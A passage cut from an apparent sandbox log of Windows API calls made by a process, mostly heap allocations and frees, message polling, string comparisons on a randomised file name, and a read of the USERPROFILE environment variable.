(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0199.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0199.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0199.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0199.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0199.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0199.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0199.912] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0199.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0199.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0199.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0199.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0199.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0199.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0199.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0199.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0199.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0199.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0199.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0199.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0199.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jfoRUvp.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0199.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="foRUvp.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0199.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oRUvp.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0199.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RUvp.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0199.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Uvp.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0199.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vp.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0199.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0199.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0199.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0199.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0199.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0199.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0199.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0199.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0199.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0199.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0199.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0199.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0199.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0199.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0199.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0199.915] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0199.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0199.915] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0199.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0199.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0199.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0199.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1868 [0199.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0199.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0199.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0199.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0199.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0199.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0199.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0199.916] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0199.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0199.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0199.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa128 [0199.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0199.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0199.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f00 [0199.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0199.916] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0199.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0199.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0199.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0199.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0199.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0199.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0199.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0199.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0199.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0199.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0199.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0199.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0199.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0199.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0199.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0199.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0199.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0199.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0199.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18e8 [0199.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0199.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0199.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0199.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0199.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0199.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b3020 [0199.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0199.918] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0199.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0199.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0199.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0199.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0199.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0199.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f00 [0199.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0199.918] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0199.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0199.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0199.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0199.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0199.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0199.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0199.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0199.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0199.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0199.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0199.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0199.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0199.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0199.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0199.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0199.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0199.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x24b3020 [0199.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0199.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0199.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0199.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0199.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0199.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0199.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1908 [0199.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0199.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0199.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0199.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0199.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18d8 [0199.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0199.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0199.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0199.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa128 [0199.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0199.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0199.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0199.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0199.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0199.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0199.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0199.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0199.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0199.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0199.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0199.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0199.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0199.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0199.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0199.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0199.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0199.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0199.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0199.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0199.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0199.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0199.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0199.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0199.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0199.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0199.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0199.921] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0199.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0199.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0199.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0199.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0199.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0199.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0199.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0199.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0199.922] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0199.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0199.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0199.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0199.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0199.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0199.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0199.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0199.922] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0199.922] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0199.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0199.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0199.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0199.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0199.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0199.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0199.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0199.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0199.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0199.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0199.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0199.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0199.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0199.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0199.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0199.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0199.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0199.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0199.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0199.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0199.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0199.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0199.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0199.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0199.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0199.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0199.924] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, 